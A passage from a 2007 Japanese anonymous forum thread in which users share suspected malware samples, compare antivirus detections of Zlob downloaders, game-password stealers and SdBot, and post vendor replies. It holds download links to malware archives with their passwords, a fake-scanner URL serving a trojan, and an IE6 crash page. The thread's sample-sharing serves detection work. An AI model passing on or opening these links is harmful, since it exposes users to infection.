先生のウィルス定義は 7/24の最新になっていますが、消えません
どなたか情報および復旧の仕方を教えてください お願いします 

362 :名無しさん@お腹いっぱい。:2007/07/26(木) 06:31:18
>>361
McAfeeで突っ込んだけど無問題だった。
 問題出る人いるのかな?

363 :名無しさん@お腹いっぱい。:2007/07/26(木) 07:49:53
ttp://goggle.net/asahineetpepper/15/asahi0843.zip
virus

364 :名無しさん@お腹いっぱい。:2007/07/26(木) 09:03:37
フツウなら本スレに相談するだろ

365 :名無しさん@お腹いっぱい。:2007/07/26(木) 09:58:06
>>344
これってウイルスなの?
爆撃以外に何かするの?

366 :名無しさん@お腹いっぱい。:2007/07/26(木) 10:10:57
http://www9.atwiki.jp/doujin-m/
これとは別物?

367 :名無しさん@お腹いっぱい。:2007/07/26(木) 14:17:56
爆撃スレにも書いたけど緊急を要するのでこっちにも書き込みします

>>344を検体として送ろうとしたら間違って実行してしもうた
カスペ試用版は期限切れで使えないんだけどどうすればいいかな
AntiLoチェッカーとAntiDojin Killerでチェックしたけど感染してないって出る
カスペオンラインスキャンかけてみたけどシステム復元のファイルにあるだけで該当ファイルが見つからん
レジストリにもスタートアップにも不審なのが見つからない
感染してないのかな?でも確かにダブルクリックしたんだよなぁ、、

368 :名無しさん@お腹いっぱい。:2007/07/26(木) 14:36:56
カスペ買って来い

369 :名無しさん@お腹いっぱい。:2007/07/26(木) 16:56:09
これ使え。
ttp://www.nifty.com/security/vcheck/
カスペのオンラインスキャンと同じで、駆除もできるそうだ。

370 :名無しさん@お腹いっぱい。:2007/07/26(木) 20:56:59
>>344

>>344
カスペ7:1件だけ。トロイのダウンローダー。
detected: Trojan program Trojan-Downloader.Win32.Agent.bym
File: C:\***\tane_uljp00077.rar/antilo0725.zip/antilo0725/(成年コミック) [KEN] エッチな小学校.exe//UPX


371 :367:2007/07/27(金) 08:18:58
>>369
ありがとうございました
それでスキャンしてみたのですが2ちゃんねるの専用ブラウザの誤認コード以外検出しませんでした。
感染してなかったのかな・・・?

372 :名無しさん@お腹いっぱい。:2007/07/28(土) 17:12:39
ttp://www.njk.ed.jp/life/uniform/index.html

373 :名無しさん@お腹いっぱい。:2007/07/28(土) 17:42:50
"theteenxxx.com/index.shtml"
"www.enhancevideos.com/download.php?id=199"に繋がってアヤしいEXEをダウンロード

Kasperskyが"Trojan-Downloader.Win32.Zlob.bvm"を検出
現時点ではNortonなどほとんどのアンチウィルスが未対応、注意されたし

374 :名無しさん@そうだ選挙に行こう:2007/07/29(日) 09:13:27
>>373
ttp://www.siteadvisor.com/sites/theteenxxx.com
ttp://www.siteadvisor.com/sites/enhancevideos.com


375 :名無しさん@そうだ選挙に行こう:2007/07/29(日) 09:15:10

>>373
www.siteadvisor.com/sites/theteenxxx.com
www.siteadvisor.com/sites/enhancevideos.com
おつかれ(・∀・)ノシ

376 :名無しさん@そうだ選挙に行こう:2007/07/29(日) 17:38:46
McAfeeのSiteAdvirsorの結果は、あくまで参考程度にとどめておいたほうがいい。

理由)頻繁に情報を更新していないし、できないので、「青」だから大丈夫といっても、
実はハッカーに攻撃されていて、実は「赤」だったという例がある。
また、ドメイン譲渡などで、実はアングラサイトに変わっていたという例もある。



377 :名無しさん@お腹いっぱい。:2007/08/05(日) 12:52:52
ttp://www5.uploader.jp/dl/tane/tane_uljp00082.zip.html
pass: DNSChanger

McAfeeには提出済み

378 :名無しさん@お腹いっぱい。:2007/08/05(日) 13:26:20
kis
0 1 2の3個提出

379 :名無しさん@お腹いっぱい。:2007/08/05(日) 13:45:37
>>377
ウイルスキラー2007
ttp://www5.uploader.jp/user/tane/images/tane_uljp00083.png

380 :名無しさん@お腹いっぱい。:2007/08/05(日) 14:02:35
McAfee未検出(2007/08/05現在
>151 >225 >238 >264

McAfee検出(2007/08/05現在
>168

 ■■■  ■ ■■ ■■■■■
■    ■  .■        ■
■    ■ ■        ■
.■    .■ ■      ■
 ■■■  .■     ■■■■■


381 :名無しさん@お腹いっぱい。:2007/08/05(日) 14:13:36
>>377
KINGSOFT 全て未検出、送っておいた

382 :名無しさん@お腹いっぱい。:2007/08/05(日) 14:16:49
>>378
GJ

最近はKasperskyでも未検出がよくあるが
これは提出されているマルウェアがレアなものだから?

383 :名無しさん@お腹いっぱい。:2007/08/05(日) 14:25:29
>>382
トータルでかけたらkasp 0 1 2共に検出の表示になるんだよね エフセキュアも
なんだろね?

384 :名無しさん@お腹いっぱい。:2007/08/05(日) 14:27:52
>>168
AhnLab-V3未検出

385 :名無しさん@お腹いっぱい。:2007/08/05(日) 14:39:37
>>377
VB2007
0 1 6 8 bがCPRでPossible_ZLOB-2検出。
しかし検出のみなので送っておいた。

386 :名無しさん@お腹いっぱい。:2007/08/05(日) 15:12:28
まだ返信来てないけどkasp 0 1 2検出完了かな

387 :名無しさん@お腹いっぱい。:2007/08/05(日) 15:14:27
現状ではここのサンプルは何社くらいに送られてるのかな

388 :名無しさん@お腹いっぱい。:2007/08/05(日) 15:25:40
Risingに2分割して送付した結果
1通はすべて不是病毒
もう一通(0〜5だと思う)は
   1.文件名:setup.exe
   病毒名:Trojan.DL.Zlob.gen
   2.文件名:setup.exe
   病毒名:Trojan.DL.Zlob.gen
   3.文件名:setup.exe
   病毒名:Trojan.DL.Zlob.gen
   4.文件名:setup.exe
   病毒名:Trojan.DL.Win32.Zlob.ccs
   5.文件名:setup.exe
   病毒名:Trojan.DL.Win32.Zlob.cct
   6.文件名:setup.exe
   病毒名:Trojan.DL.Zlob.gen

急いで回答しないでいいからじっくり解析してくれw

389 :名無しさん@お腹いっぱい。:2007/08/05(日) 15:37:54
>>387
俺とお前と愛しさと切なさと心強さと部屋とYシャツと私と大五郎〜♪

390 :名無しさん@お腹いっぱい。:2007/08/05(日) 15:48:17
>>377
AVG
9からTrojan horse Downloader.Zlob.HF
aからTrojan horse Downloader.Zlob.HS検出
残りは検体送りました

391 :名無しさん@お腹いっぱい。:2007/08/05(日) 18:11:57
>>377
ウイルスバスター2007
0、1、6、、8、b 未検出だったので検体送り

392 :名無しさん@お腹いっぱい。:2007/08/05(日) 18:25:26
>>377
カスペ7
今北産業、

全検体検出した。

対応してくれたのかな?
検体提出者d。

detected: Trojan program Trojan-Downloader.Win32.Zlob.byd File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/0/setup.exe//stream//data0006
detected: Trojan program Trojan-Downloader.Win32.Zlob.byd File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/1/setup.exe//stream//data0006
detected: Trojan program Trojan-Downloader.Win32.Zlob.byd File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/2/setup.exe//stream//data0006
detected: Trojan program Trojan-Downloader.Win32.Zlob.bxu File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/3/setup.exe//stream//data0006
detected: Trojan program Trojan-Downloader.Win32.Zlob.bxq File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/4/setup.exe//stream//data0006
detected: Trojan program Trojan-Downloader.Win32.Zlob.bwd File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/5/setup.exe//stream//data0006
detected: Trojan program Trojan-Downloader.Win32.Zlob.bwd File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/6/setup.exe//stream//data0006
detected: Trojan program Trojan-Downloader.Win32.Zlob.bwd File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/7/setup.exe
detected: Trojan program Trojan-Downloader.Win32.Zlob.bwd File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/8/setup.exe//stream
detected: Trojan program Trojan-Downloader.Win32.Zlob.bxi File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/9/setup.exe//stream//data0006
detected: Trojan program Trojan-Downloader.Win32.Zlob.bxi File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/a/setup.exe//stream
detected: Trojan program Trojan-Downloader.Win32.Zlob.bwe File: C:\Users\\Desktop\tane_uljp00082.zip/Zlob/b/setup.exe//stream//data0006


393 :名無しさん@お腹いっぱい。:2007/08/05(日) 18:35:14
>>392
おまいの報告もGJ

394 :名無しさん@お腹いっぱい。:2007/08/05(日) 19:13:32
Nullsoft PiMP Stubというpacker使われてるみたいね。
中華産かな?

395 :名無しさん@お腹いっぱい。:2007/08/05(日) 19:24:41
有害か無害かは知らんけど、
NullsoftってくらいだからWinAMP絡みじゃないか?
PiMP は Plugin Mini Packager だそうだ。

396 :名無しさん@お腹いっぱい。:2007/08/05(日) 19:41:19
>>395
なる
aviraにNullsoft PiMP使ったmalwareの例があったから新種のpackerってわけでもないのか。
http://www.avira.com/jp/threats/section/fulldetails/id_vir/2483/tr_dldr.dnschan.r.5.html

アンパッキングできてないというより亜種検出ができてないってのが各ベンダーの低検出につながっってるみたいね。
ダウンローダーはヒューリステイック検出されにくいんだろうな。

397 :名無しさん@お腹いっぱい。:2007/08/05(日) 19:55:44
>>394
思わず、ガッ!

398 :名無しさん@お腹いっぱい。:2007/08/05(日) 20:19:57
>>378>>383の原因わかったよ
返信内容
This files are already detected as Trojan-Downloader.Win32.Zlob.byd. Please update your antivirus bases.

あれだ bydグループ 0 1 2の定義ファイルメンテ
ウィルストータルとその時の自分の定義ファイルにラグがあって検出・未検出の違いが出たみたい

399 :名無しさん@お腹いっぱい。:2007/08/05(日) 20:21:53
順番的にyだから既出だったと・・・

400 :名無しさん@お腹いっぱい。:2007/08/05(日) 20:42:44
VIRUS TOTALは鯖増強したみたいでサクサクになったのが助かるな。
RISINGがいつの間にか参加してるし。

401 :名無しさん@お腹いっぱい。:2007/08/05(日) 21:10:18
>>377
これってインストールしないと無害なの?

402 :名無しさん@お腹いっぱい。:2007/08/05(日) 21:13:42
Zlob(ゼットロブ)とは

Zlobとは、スパイウエアの一種で動画再生に必要なコーデック(CODEC)に仕込まれている。

基本的な侵入の手口をまとめると以下の通りとなる。

(1)ユーザーが動画を見ようとしてリンクをクリックすると「この動画は再生できません。再生のために必要なコーデックをダウンロードするにはここをクリックしてください」といったメッセージが表示される。
(2)メッセージに従ってリンクをクリックすると、Zlobを含むコーデックが置かれたサイトへ誘導される。
(3)コーデック自体は本物なので、インストールすれば実際に動画を見られるようになる場合がある。
(4)しかし、同時にZlobもインストールされる。

このスパイウエアは、自分自身を有用なプログラムと見せかけてユーザーのパソコンに侵入する点でトロイの木馬であり、その機能は、別のプログラムを密かにダウンロード、インストールする「ダウンローダー」である。

しかし、そこからキーロガー、詐欺的セキュリティソフトといった別のマルウエアがインストールされてしまうという非常に悪質なスパイウエアであり、様々なセキュリティ対策企業が注意を喚起している。

動画視聴の際は、アクセスするサイトが信頼できるかを十分確認したい。



403 :名無しさん@お腹いっぱい。:2007/08/05(日) 21:15:46
>>402
dクス
実行してみたけどキャンセルすれば無害だね

404 :名無しさん@お腹いっぱい。:2007/08/05(日) 21:19:49
w→x→y既出にはなんねw

405 :名無しさん@お腹いっぱい。:2007/08/05(日) 22:11:01
>>402
当然、仮想環境で実行したよね。


406 :名無しさん@お腹いっぱい。:2007/08/05(日) 22:13:09
>>405
普通に実行した

407 :名無しさん@お腹いっぱい。:2007/08/05(日) 23:30:07
ワロタ

408 :名無しさん@お腹いっぱい。:2007/08/05(日) 23:39:14
>>406は猛者だな。

409 :名無しさん@お腹いっぱい。:2007/08/05(日) 23:40:20
馬鹿だろ

410 :名無しさん@お腹いっぱい。:2007/08/06(月) 08:22:53
>>377
Avira 遅れた

--> Zlob/0/setup.exe
[DETECTION] Is the Trojan horse TR/Zlob.CA.86
--> Zlob/1/setup.exe
[DETECTION] Contains signature of the dropper DR/Dldr.Zlob.byd
--> Zlob/2/setup.exe
[DETECTION] Is the Trojan horse TR/Zlob.CA.85
--> Zlob/3/setup.exe
[DETECTION] Contains signature of the dropper DR/Dldr.Zlob.bxu.7
--> Zlob/4/setup.exe
[DETECTION] Contains signature of the dropper DR/Dldr.Zlob.bxq
--> Zlob/5/setup.exe
[DETECTION] Contains signature of the dropper DR/Dldr.Zlob.bwd.19
--> Zlob/6/setup.exe
[DETECTION] Is the Trojan horse TR/Zlob.CA.72
--> Zlob/7/setup.exe
[DETECTION] Contains signature of the dropper DR/Dldr.Zlob.bwd.20
--> Zlob/8/setup.exe
[DETECTION] Contains signature of the dropper DR/Dldr.Zlob.bxc.7
--> Zlob/9/setup.exe
[DETECTION] Contains signature of the dropper DR/Dldr.Zlob.bxi.10
--> Zlob/a/setup.exe
[DETECTION] Contains signature of the dropper DR/Dldr.Zlob.bvm.19
--> Zlob/b/setup.exe
[DETECTION] Is the Trojan horse TR/Zlob.70480

誰か検体送ってくれたのかな?全て検出

411 :名無しさん@お腹いっぱい。:2007/08/06(月) 11:25:27
>>377
ウイルスキラー2007
定義19.35ですべて検出
3=Trojan.DL.Win32.Zlob.ccs
4=Trojan.DL.Win32.Zlob.cct
9=Trojan.DL.Win32.Zlob.k
a=Trojan.DL.Win32.Zlob.j
他=Trojan.DL.Zlob.GEN(>>379)

412 :名無しさん@お腹いっぱい。:2007/08/06(月) 12:57:01
www.lavedoor.com/list.rar
中のscrはRAR-SFXなexe。

413 :名無しさん@お腹いっぱい。:2007/08/06(月) 13:09:26
>412
 乙です!!
McAfee
検出
トロイの木馬
・PWS-Lineage.dll



414 :名無しさん@お腹いっぱい。:2007/08/06(月) 14:07:19
>>410
遅くなっても報告乙

415 :名無しさん@お腹いっぱい。:2007/08/06(月) 14:53:50
>>412
Risingに送りますた

416 :名無しさん@お腹いっぱい。:2007/08/06(月) 16:11:04
自演乙

417 :名無しさん@お腹いっぱい。:2007/08/06(月) 16:11:56
>>412
d

カスペ7
検出結果

detected: Trojan program Trojan-PSW.Win32.OnLineGames.aes File: C:\Users\Desktop\list.rar/list.scr//data.rar/2.exe
detected: Trojan program Trojan-PSW.Win32.OnLineGames.aes File: C:\Users\Desktop\list.rar/list.scr//data.rar/3.exe
detected: Trojan program Trojan-PSW.Win32.OnLineGames.aes File: C:\Users\Desktop\list.rar/list1.scr//data.rar/2.exe
detected: Trojan program Trojan-PSW.Win32.OnLineGames.aes File: C:\Users\Desktop\list.rar/list1.scr//data.rar/3.exe
detected: Trojan program Trojan-PSW.Win32.OnLineGames.aes File: C:\Users\Desktop\list.rar/list2.scr//data.rar/2.exe
detected: Trojan program Trojan-PSW.Win32.OnLineGames.aes File: C:\Users\Desktop\list.rar/list2.scr//data.rar/3.exe



418 :名無しさん@お腹いっぱい。:2007/08/06(月) 16:21:35
>>412
ウイルスバスター2007
SCRのままだとスルー,解凍してスキャンすると以下の通り
TROJ_NSPM.SF list\2.exe
TSPY_LINEAGE.FUO list\3.exe
TROJ_NSPM.SF list2\2.exe
TSPY_LINEAGE.FUO list2\3.exe
TROJ_NSPM.SF list3\2.exe
TSPY_LINEAGE.FUO list3\3.exe

419 :名無しさん@お腹いっぱい。:2007/08/06(月) 16:34:18
>>412
KINGSOFT全部スルー

420 :名無しさん@お腹いっぱい。:2007/08/06(月) 16:36:57
24時間、セキュ板にいるNOD厨が来ない件について

421 :名無しさん@お腹いっぱい。:2007/08/06(月) 16:51:38
★他スレからの転載

       不正アクセスしてくるIPを晒すスレPart10
  http://pc11.2ch.net/test/read.cgi/sec/1162293871/941-942

941 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/08/06(月) 01:31:57
ttp://up.tseb.net/src/up8862.zip

netstatで見たらこれw

942 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/08/06(月) 01:52:56
>>941

ウイルス危険踏むな!


  McAfee検出出来ず・・・。 McAfee使いの方、早急に送っといてください。

422 :名無しさん@お腹いっぱい。:2007/08/06(月) 16:59:29
どう見てもただのテキストファイルです、本当にありがとうございました

423 :名無しさん@お腹いっぱい。:2007/08/06(月) 17:07:00
>>412
BitDefender
2.exeのみInfected Packer.Malware.NSAnti.Hとして検出
3.exeはスルー

424 :422:2007/08/06(月) 17:12:09
m(_ _)m

425 :名無しさん@お腹いっぱい。:2007/08/06(月) 18:27:52
>>412
Risingから19.35.11で対応予定
2.exe=Trojan.Win32.Agent.uyg
3.exe=Trojan.PSW.Win32.Lineage.epz


426 :名無しさん@お腹いっぱい。:2007/08/06(月) 19:47:15
キラーはなにげに解析と対応が速いな。

427 :名無しさん@お腹いっぱい。:2007/08/06(月) 20:06:08
性能はアレだが対応は早いな。
キングやドクターよりまとも。

428 :名無しさん@お腹いっぱい。:2007/08/06(月) 20:43:33
>>410
その当時ちょこっと未検出あったような
だれか送ったんだろうね

429 :名無しさん@お腹いっぱい。:2007/08/06(月) 20:49:33
>>412
Avira Antivir 全て検出

--> list/list.scr
[1] Archive type: RAR SFX (self extracting)
--> 2.exe
[DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
--> list/list1.scr
[1] Archive type: RAR SFX (self extracting)
--> 2.exe
[DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
--> list/list2.scr
[1] Archive type: RAR SFX (self extracting)
--> 2.exe
[DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen

430 :名無しさん@お腹いっぱい。:2007/08/06(月) 20:51:11
>TR/Crypt.NSPM.Gen
これはPackerな気がする。
AntiVirはUpackとかMalware扱いするからなぁ。

431 :429:2007/08/06(月) 21:11:13
これは各rarにjpg1、exe2あるのか
2つのexeのうち1つだけウィルス?
残ってるexeはどうしよう

432 :名無しさん@お腹いっぱい。:2007/08/06(月) 21:23:06
YOU、とりあえず、全部送っちゃいなよ。

433 :429:2007/08/06(月) 21:28:44
残った3.exeもトロイか
HEUR/Malwareとなってるが検出できなかった
検体送るわ
ttp://www.virustotal.com/resultado.html?9ba080c42e915af4a3ea41baa0d5deed#
ttp://www5.uploader.jp/user/tane/images/tane_uljp00084.png

434 :名無しさん@お腹いっぱい。:2007/08/06(月) 21:39:25
ノートンシェア世界一のくせに無力過ぎ

435 :425:2007/08/06(月) 21:39:38
>>433
あれ、3.exeだけ定義にもう反映されてたのか

436 :名無しさん@お腹いっぱい。:2007/08/06(月) 22:01:32
Microsoft OneCareですら検知してるな

437 :名無しさん@お腹いっぱい。:2007/08/07(火) 19:13:23

10年前の最新(´・ω・) カワイソス山田ヲチスレ 350
ttp://tmp6.2ch.net/test/read.cgi/download/1186290090/920-923
ttp://tmp6.2ch.net/test/read.cgi/download/1186290090/926-928


池田大作.scr ノートン無反応(´・ω・) ス
参考までに
ttp://sea.s201.xrea.com/src/yamada4668.zip

おいらの場合、脊髄造影は年に一回やらなきゃいけない(´・ω・) ス





438 :437:2007/08/07(火) 19:23:49
目欄

439 :名無しさん@お腹いっぱい。:2007/08/07(火) 19:52:20
>>437
ウイルスキラー死亡(´・ω・) ス

440 :名無しさん@お腹いっぱい。:2007/08/07(火) 19:57:35
>>437
McAfeeのWebImmuneに提出したらno malwareとかいわれてしまった
これではAVERT送りにならん

441 :名無しさん@お腹いっぱい。:2007/08/07(火) 21:08:18
スラドネタ
IE6を一行でクラッシュさせるコード
http://slashdot.jp/security/

テストページ
http://hamachiya.com/junk/ie_crash.html

こういうのってウイルス認定されるんかいな?
カスペとAviraにはサンプル提出スミ 解析待ち

442 :441:2007/08/07(火) 21:39:37
Aviraから返事キタ

The file '1.html' has been determined to be 'CLEAN'. Our analysts did not discovered any malicious content

マジかよ…

MSに直訴するしかねえってか

443 :名無しさん@お腹いっぱい。:2007/08/07(火) 21:58:47
>>437
AntiVirの提出用ページから送ったらウイルスじゃねーっていわれた

444 :名無しさん@お腹いっぱい。:2007/08/07(火) 22:01:59
>>441

つ Internet Explorer 7.0

445 :441:2007/08/07(火) 22:09:25
7でも落ちるひといるみたいよ
DonutRAPTとかIEコンポーネント系だとOUTらしい
これMSがなんとかしてくんないとなあ

446 :名無しさん@お腹いっぱい。:2007/08/07(火) 22:58:16
>>437
ウイルスバスター 2007スルー
検体送りました。

>>441
IE7フルパッチで問題なし。
OSはXPとVista(保護モード有効)

447 :名無しさん@お腹いっぱい。:2007/08/07(火) 23:09:35
>>441
OPERAは無問題
プニルとか平気なのか?

448 :名無しさん@お腹いっぱい。:2007/08/07(火) 23:19:52
ブラクラの一種じゃねーの?

449 :名無しさん@お腹いっぱい。:2007/08/07(火) 23:20:37
>>437

Hello,

####.scr_

No malicious code was found in this file.

Please quote all when answering.

Best regards, Miyuki Sugimoto
Virus analyst, Kaspersky Lab.

450 :名無しさん@お腹いっぱい。:2007/08/07(火) 23:22:07
アンチウイルスよりオミトロンあたりの出番だったりして?

451 :名無しさん@お腹いっぱい。:2007/08/07(火) 23:25:24
>>449
中の人は日本人か

452 :名無しさん@お腹いっぱい。:2007/08/07(火) 23:28:38
>>451
そうみたいだね。

ウイルスアナリスト@モスクワ募集しているから。

453 :名無しさん@お腹いっぱい。:2007/08/07(火) 23:29:42
>>437
AVG未検出
検体送りました

454 :名無しさん@お腹いっぱい。:2007/08/07(火) 23:32:49

(´・ω・) カワイソス 山田ヲチスレ 351
http://tmp6.2ch.net/test/read.cgi/download/1186485802/l50


42 名前: [名無し]さん(bin+cue).rar [sage] 投稿日: 2007/08/07(火) 21:17:26 ID:JIoqcdtH0
前スレの池田大作.scrは System32にあるvssvc.exeをリネームしただけみたい(´・ω・) スね
プロパティもハッシュも同じで(´・ω・) ス

455 :名無しさん@お腹いっぱい。:2007/08/07(火) 23:35:54
>>451-452
ハァハァさせちゃってごめんね 妄想デス でっちあげデス フィクションデース 僕パンツいっちょデース

456 :名無しさん@お腹いっぱい。:2007/08/08(水) 04:13:18
MSNメッセンジャーで流行っているウイルスの検体手に入ったので検出報告お願い致します。

http://www5.uploader.jp/dl/tane/tane_uljp00089.zip.html
DLパス[kahi] zipパス[virus]

AVG7.5 FREEは検出出来ず。
AntivirはWORM/Sdbot.41984.42と検出

457 :名無しさん@お腹いっぱい。:2007/08/08(水) 04:17:50
>>456
キラーとキングに送付済み

458 :名無しさん@お腹いっぱい。:2007/08/08(水) 06:16:57
>>456
カスペ 6
img1756.zip/img1756.scr
Backdoor.Win32.SdBot.aad

459 :441:2007/08/08(水) 06:42:20
http://www.virustotal.com/resultado.html?f5e8d2b2fe64a01da5e6e089b8fa8ec4

460 :441:2007/08/08(水) 06:44:18
>>459>>456の対応状況

461 :名無しさん@お腹いっぱい。:2007/08/08(水) 07:19:31
>>456
AntiVir 7.4.0.57 Worm/Sdbot.41984.42
BitDefender 7.2 Backdoor.Sdbot.AUX
Ikarus T3.1.1.12 Backdoor.SdBot.AUX

Kaspersky 4.0.2.24 Backdoor.Win32.SdBot.aad

Symantec 10 W32.Scrimge.A

Webwasher-Gateway 6.0.1 Worm.Sdbot.41984.42

AVG Avast! NOD32 には送付済み。

462 :名無しさん@お腹いっぱい。:2007/08/08(水) 07:28:41
>>458
早っ
さすがミユキちゃん

463 :名無しさん@お腹いっぱい。:2007/08/08(水) 08:46:52
>>456
McAfee ヽ(`Д´)ノ

……送ります

464 :名無しさん@お腹いっぱい。:2007/08/08(水) 10:34:20
http://www5.uploader.jp/dl/tane/tane_uljp00090.zip.html
pass:virus

465 :名無しさん@お腹いっぱい。:2007/08/08(水) 11:34:07
>>456
TrendMicro スルー
検体送付しました。

>>464
test.exe Possible_Troj551 検出のみ
test.wsf VBS_Generic 隔離
念のため両方とも検体送付済みです

466 :名無しさん@お腹いっぱい。:2007/08/08(水) 11:43:55
>>464
Risingに送りました

467 :名無しさん@お腹いっぱい。:2007/08/08(水) 11:47:00
>>464
Avira Antivir

--> ???I?t?H???_/test.exe
[DETECTION] Is the Trojan horse TR/Keygen.Q.26
--> ???I?t?H???_/test.wsf
[DETECTION] Contains signature of the VBS script virus VBS/Psyme.E

468 :名無しさん@お腹いっぱい。:2007/08/08(水) 11:52:06
>464
お疲れ様です!!。
McAfee
検出: VBS/Psyme (トロイの木馬)


469 :名無しさん@お腹いっぱい。:2007/08/08(水) 12:16:45
>>464
McAfee
test.exe : New Malware.aj

提出しときます

470 :名無しさん@お腹いっぱい。:2007/08/08(水) 13:17:45
>>464
NOD32も検体を送りますorz

471 :名無しさん@お腹いっぱい。:2007/08/08(水) 13:19:47
カスペまだかーい?

472 :名無しさん@お腹いっぱい。:2007/08/08(水) 13:52:47
>>464
今北産業ーーーーーーーーーーーーー!

カスペ7
スルー。

検体提出。

473 :名無しさん@お腹いっぱい。:2007/08/08(水) 14:47:42
>>456
Risingより19.35.22で対応予定
   1.文件名:img1756.scr
   病毒名:Trojan.Win32.Agent.kr



474 :名無しさん@お腹いっぱい。:2007/08/08(水) 15:09:34
>>464
AVG
test.exeからTrojan horse Generic5.JVH検出
test.wsfからVirus found JS/Psyme検出

475 :名無しさん@お腹いっぱい。:2007/08/08(水) 19:22:03
>>472
( ・∀・)っ旦~

476 :名無しさん@お腹いっぱい。:2007/08/08(水) 19:57:08
>>472
GJ

477 :名無しさん@お腹いっぱい。:2007/08/08(水) 20:02:42
自演乙

478 :名無しさん@お腹いっぱい。:2007/08/08(水) 20:05:43
>>472
随分時間経ったけど・・・

479 :名無しさん@お腹いっぱい。:2007/08/08(水) 20:05:59
IE6クラッシュコード アメリカに飛び火してんな
http://immike.net/blog/2007/08/06/single-line-of-html-crashes-ie-6/

480 :名無しさん@お腹いっぱい。:2007/08/08(水) 20:19:38
>>464
avast!スルー
http://up.uppple.com/src/up5288.jpg
\(^o^)/

481 :名無しさん@お腹いっぱい。:2007/08/08(水) 21:34:51
勇気がなくて踏めない人のための鑑定スレPart15
ttp://pc11.2ch.net/test/read.cgi/hack/1184605923/186-189

p://scanner.malwarealarm.com/

 ( ´∀`)< 大丈夫かな?

482 :名無しさん@お腹いっぱい。:2007/08/08(水) 21:51:09
勇気がなくて踏めない人のための鑑定スレPart15
ttp://pc11.2ch.net/test/read.cgi/hack/1184605923/342-343

McAfee未検出
McAfee使いの方、提出してください(初心者なので送る事が出来ません・・

483 :名無しさん@お腹いっぱい。:2007/08/08(水) 21:54:31
>>464
KINGSOFTスルー 検体送付済み
BitDefender
test.wsf Infected Generic.XPL.ADODB.B991A0C8
test.exe Infected Trojan.Keygen.Q

484 :名無しさん@お腹いっぱい。:2007/08/08(水) 22:09:19
キラー
>>481
Install115.exe
未対応
>>482
d:\virus\archive.exe>>upx_c
Worm.Mail.Warezov.cj

485 :名無しさん@お腹いっぱい。:2007/08/08(水) 23:44:46
ウイルスバスター2007
>>481
Install115.exe スルー
>>482
archive.exe Possible_Strat-6 検出のみ

検体送っておきました

486 :名無しさん@お腹いっぱい。:2007/08/09(木) 00:35:11
【ソースネクスト/K7】 ウイルスセキュリティZERO/2007 #14
http://pc11.2ch.net/test/read.cgi/sec/1185715056/230


230 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/08/09(木) 00:31:16
ttp://tnpt.net/uploader/src/up12133.lzh
このソフトで引っかかる?
最新のういーるす・・・・・・なはずだが。
中身WAVっぽいね。


McAfee反応なし。
どなたか提出お願いします。

487 :名無しさん@お腹いっぱい。:2007/08/09(木) 00:37:11
ttp://www.virustotal.com/resultado.html?433516e7cd60df57eec3849392824319

488 :472:2007/08/09(木) 01:03:40
>>464について、カスペから返事キタ━━━━━━(゚∀゚)━━━━━━ !!

From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Wednesday, August 08, 2007 11:47 PM
Subject: RE: Please Inspect this file, A New Virus? [KLAB-2590379]

Hello,

test.exe_,test.wsf

No malicious code were found in these files.
(有害なコードは全く含まれていません。)

Please quote all when answering.

--
Best regards, Dmitry Shvetsov
Virus analyst, Kaspersky Lab.


ということで。カスペの判定は白。

Avira,McAfee、AVG,BitDefenderは誤検知か?

他社解析結果待ち。(キラー返答来てないか?)



489 :名無しさん@お腹いっぱい。:2007/08/09(木) 01:10:19
スクリプト見たけど、29chやみみずん検索を
Janeに食わせるツールとかじゃねーの?

490 :名無しさん@お腹いっぱい。:2007/08/09(木) 01:17:34
>>486
ただのノイズじゃないか、精神的にビックリしたよ

491 :名無しさん@お腹いっぱい。:2007/08/09(木) 01:52:15
>>481
ZA PROがサイトをブロック。解除して入ると偽のSecurity Scannerのページが出る
http://www5.uploader.jp/user/tane/images/tane_uljp00094.png
ttp://scanner.malwarealarm.com/10/ ←これでInstall115.exeをDL出来る

[DETECTION] Is the Trojan horse TR/Zlob.CA.78

>>482
archive.exe
[DETECTION] Is the Trojan horse TR/Crypt.XPACK.Gen

以上 avira でした

492 :名無しさん@お腹いっぱい。:2007/08/09(木) 10:18:48
McAfee

>>481
nstall115.exe : Downloader-AFH.gen

>>482
archive.exe : ヽ(`Д´)ノ

493 :名無しさん@お腹いっぱい。:2007/08/09(木) 13:37:42
ttp://www.kinchan.net/ip.htm

McAfee   ....orz

494 :名無しさん@お腹いっぱい。:2007/08/09(木) 14:02:54
>>493
ただのIP抜きじゃねーか

495 :名無しさん@お腹いっぱい。:2007/08/09(木) 14:05:25
>494
止めてくれないんですね。

496 :名無しさん@お腹いっぱい。:2007/08/09(木) 15:57:42
Risingより
>>464
   1.文件名:test.exe
   不是病毒
   2.文件名:test.wsf
   病毒名:Trojan.DL.JS.Agent.lkk
>>481
   1.文件名:Install115.exe
   :)病毒名:Trojan.Win32.Agent.vcz

497 :名無しさん@お腹いっぱい。:2007/08/09(木) 17:57:48
>>495
害のないものを検出する義理はアンチウイルスソフトにはなかろ
それにクライアント側で不審な動作をするわけでなし

498 :名無しさん@お腹いっぱい。:2007/08/09(木) 19:13:23
ttp://www.cigital.com/hostile-applets/Rube/NoisyBear/NoisyBear.html
McAfee反応なし。
どなたか提出お願いします。

↑アクセス後AntiVirusKitでスキャンするとウイルス反応があるので・・・。


499 :名無しさん@お腹いっぱい。:2007/08/09(木) 19:25:03
zipでくれ

500 :名無しさん@お腹いっぱい。:2007/08/09(木) 19:26:10
メチャ面白い だってさ

>>488

Hello.

test.exe - not-a-virus:Tool.Win32.TPE.f
test.wsf - clean
This file is already detected. Please update your bases.
-----------------
Regards, Oleg Ishanov
